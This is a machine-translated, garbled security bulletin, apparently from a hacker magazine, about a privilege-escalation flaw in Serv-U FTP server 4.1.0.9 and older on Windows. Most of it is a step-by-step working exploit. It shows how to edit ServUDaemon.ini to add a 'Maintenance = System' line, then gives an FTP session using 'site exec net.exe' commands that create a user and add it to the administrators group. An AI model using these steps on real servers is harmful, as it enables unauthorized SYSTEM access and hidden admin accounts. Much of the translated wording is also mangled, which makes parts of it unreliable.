Lokale utvidede rettigheter: Ja
Remote utvidede rettigheter: Ja
Bruk forutsetninger: Serv-U-profil på en endret tillatelse
Ansvarsfraskrivelse: Dette er bare et privilegium opptrapping ideer og metoder.
1, den berørte programvaren
Serv-U FTP server 4.1.0.9 (og alle tidligere versjoner)
For det andre, det berørte systemet
Alle versjoner av Microsoft Windows Server 2003
Alle versjoner av Microsoft Windows XP
Alle versjoner av Microsoft Windows 2000
Alle versjoner av Microsoft Windows NT
Tredje, gjennomgang
Serv-U FTP server til RhinoSoft produsert en Ftp Sserver programvare, nå utbredt over hele verden. Etter jeg fant, Serv-U FTP server konfigurasjonen arkiv lagret i Serv-U FTP server filkatalogen ServUDaemon.ini fil. Dersom den lokale begrenset bruker eller en ekstern angriper som har en generell tillatelse til innsyn i saksdokumentene og nøye arkiv innholdet i strukturen ServUDaemon.ini Ftp prosessen kan bruke systemet til å kjøre vilkårlige kommandoer med SYSTEM privilegier.
4, defekt analyse:
Serv-U FTP Server vil sette brukeren konfigurasjonen informasjonen er lagret og senere ServUDaemon.ini fil. Inkludert brukerens rettigheter til informasjon og for å få tilgang til katalogen informasjon. Lokale begrenset bruker eller en ekstern angriper å lese og skrive så lenge Serv-U FTP Server filen katalog, kan du endre filer i katalogen ServUDaemon.ini Ftp prosessen med realisering av den eksterne, det lokale systemet administratorrettigheter til FTP kjøre vilkårlige kommandoer. System versjon og ikke gjenstand for effekten. (Brukerinformasjon Velg "lagring og systemet register" uten denne defekten berørt)
5, testmetode:
1, den lokale test
Anta at en lokal begrenset bruker kan bla gjennom Serv-U FTP Server filen katalogen. Finn ServUDaemon.ini fil. Bruk Notisblokk til å åpne den generelle innholdet i det opprinnelige dokumentet som:
[GLOBAL]
Versjon = 4.1.0.0 / / Serv-U Ftp Server versjonsnummer
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[Domener]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0 fil / / host IP og domenenavn, havneforhold
[Domain1]
Bruker1 = zihuan | 1 | 0
[USER = zihuan | 1]
Passord = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Hjemmeområdet = c: / / kan bla gjennom katalogen
TimeOut = 600
Access1 = C: | RWAMLCDP
Hvis ServUDaemon.in filen endres som følger:
[GLOBAL]
Versjon = 4.1.0.0
ProcessID = 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[Domener]
Domain1 = 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[Domain1]
Bruker1 = zihuan | 1 | 0
[USER = zihuan | 1]
Passord = rfE8DFBE3F7EC27FB043D4305A04E6D2C6
Hjemmeområdet = c:
TimeOut = 600
Vedlikehold = System fil / / Tillatelser type
Access1 = C: | RWAMELCDP
Det over, mer enn det opprinnelige innholdet for en "Vedlikehold = System" lagre etter redigering. Deretter bruker du Ftp pålogging til Serv-U FTP server etter gjennomføring av følgende kommando:
ftp open ip
Koblet til ip.
220 Serv-U FTP server v4.1.0.0 for WinSock klar ...
Bruker (ip: (ingen)): id fil / / bruker input struktur
331 Brukernavn ok, kan du sende hele e-postadressen din som passord.
Passord: passord fil / / passord
230 Bruker logget inn, gå videre.
ftp cd winnt fil / / inn Win2K i winnt katalogen, hvis det er winxp eller Windows Server 2003 skal være Windows-katalogen.
250 Directory endret til / WINNT
ftp cd system32 fila / / inn i system32 katalogen
250 Directory endret til / WINNT/system32
ftp siterer nettstedet exec net.exe brukeren zihuan ziHUAN / legg til fil / / bruker system net.exe filer pluss brukeren.
200 EXEC kommando lykkes (TID = 33).
ftp siterer nettstedet exec net.exe localhost administratorer zihuan / legg til fil / / oppgradere til super-user
Denne økningen i det lokale systemet, et passord for zihuan: ziHUAN superbruker. Kan også direkte siterer nettstedet exec net.exe localhost administratorer bruker / legge kommando på gjeldende bruker til å oppgradere til super brukergruppe å gå. Selvfølgelig kan du utføre en kommando på systemet.
Uttalelse:
Bøker bare for å beskrive mulige sikkerhetsproblemer, forfatteren og hackere X Files magazine denne sikkerhetsbulletinen er ikke å gi noen garanti eller løfte. Som spredningen av bruk av informasjonen i denne artikkelen, et resultat av direkte eller indirekte konsekvenser av tapet som brukeren selv er ansvarlig, ikke forfatteren ikke påta seg noe ansvar for dette. Forfattere har reviderte denne sikkerhetsbulletinen og tolkning. For denne artikkelen, gjengis eller overføres, for å sikre integriteten til denne artikkelen, inkludert opphavsrett og alt annet innhold. Tillatt uten forfatterens kan ikke endre eller endre noe av innholdet i denne artikkelen utlysing.